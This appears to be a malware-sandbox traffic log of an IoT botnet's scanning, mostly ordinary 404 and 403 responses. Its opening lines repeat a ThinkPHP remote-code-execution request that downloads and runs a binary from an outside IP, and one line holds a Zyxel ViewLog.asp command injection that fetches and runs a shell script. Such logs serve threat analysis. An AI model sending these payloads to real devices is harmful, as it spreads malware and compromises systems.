    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: unknownHTTP traffic detected: POST /cgi-bin/ViewLog.asp HTTP/1.1Host: 192.168.0.14:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.20.0Content-Length: 227Content-Type: application/x-www-form-urlencodedData Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 767Date: Wed, 14 Feb 2024 08:27:43 GMTData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 31 30 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resou
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:27:52 GMTServer: Apache/2.4.43 (Win64) mod_fcgid/2.3.10-dev OpenSSL/1.1.1fContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:27:52 GMTServer: WebsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockCache-Control: no-storeContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 14 Feb 2024 08:27:57 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 May 1970 21:40:10 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 341Connection: closeDate: Wed, 14 Feb 2024 08:28:08 GMTServer: lighttpd/1.4.54Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 Not Found</title> </head> <body> <h1>404 Not Found</h1> </body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Wed, 14 Feb 2024 08:28:08 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:28:10 GMTServer: Apache/2.2.16 (Debian)Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 181Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 4b 0f 82 30 10 84 ef fc 8a 95 bb 2c 1a 8e 4d 0f f2 88 24 88 c4 94 83 47 4c d7 94 04 69 a5 c5 c7 bf 97 c7 c5 e3 ec cc 37 b3 6c 93 9c 63 71 ad 52 38 8a 53 01 55 7d 28 f2 18 fc 2d 62 9e 8a 0c 31 11 c9 ea ec 83 10 31 2d 7d ee 31 e5 1e 1d 67 8a 1a 39 09 d7 ba 8e 78 14 46 50 6a 07 99 1e 7b c9 70 3d 7a 0c 97 10 bb 69 f9 9d b9 1d ff cb 4c ca 63 86 0b 45 30 d0 73 24 eb 48 42 7d 29 00 db 5e d2 27 30 ca c0 bb b1 d0 4f c8 7d 46 40 f7 e0 54 6b c1 d2 f0 a2 21 60 68 e6 89 a5 7c aa 9b 9f f2 7e 74 46 9f df cf 00 00 00 Data Ascii: MK0,M$GLi7lcqR8SU}(-b11-}1g9xFPj{p=ziLcE0s$HB})^'0O}F@Tk!`h|~tF
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 14 Feb 2024 08:28:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:28:17 GMTConnection: CloseCache-Control: no-storeX-Content-Type-Options: nosniffX-Frame-Options: DENYContent-Security-Policy: default-src 'none'; frame-ancestors 'none'; script-src 'none'; object-src 'none'; connect-src *.ookla.com *.speedtest.net *.ookla2.ictvanloon.nl *.speedtestcustom.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.0.15Date: Wed, 14 Feb 2024 08:28:17 GMTContent-Type: text/html; charset=utf-8Content-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 30 2e 31 35 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.0.15</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 09:28:19 GMTServer: TruVisionCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99X-FRAME-OPTIONS: SAMEORIGINData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0X-NWS-LOG-UUID: 10951030289777879770Connection: closeServer: ECDN_D2Date: Wed, 14 Feb 2024 08:28:23 GMTX-Cache-Lookup: Return Directly
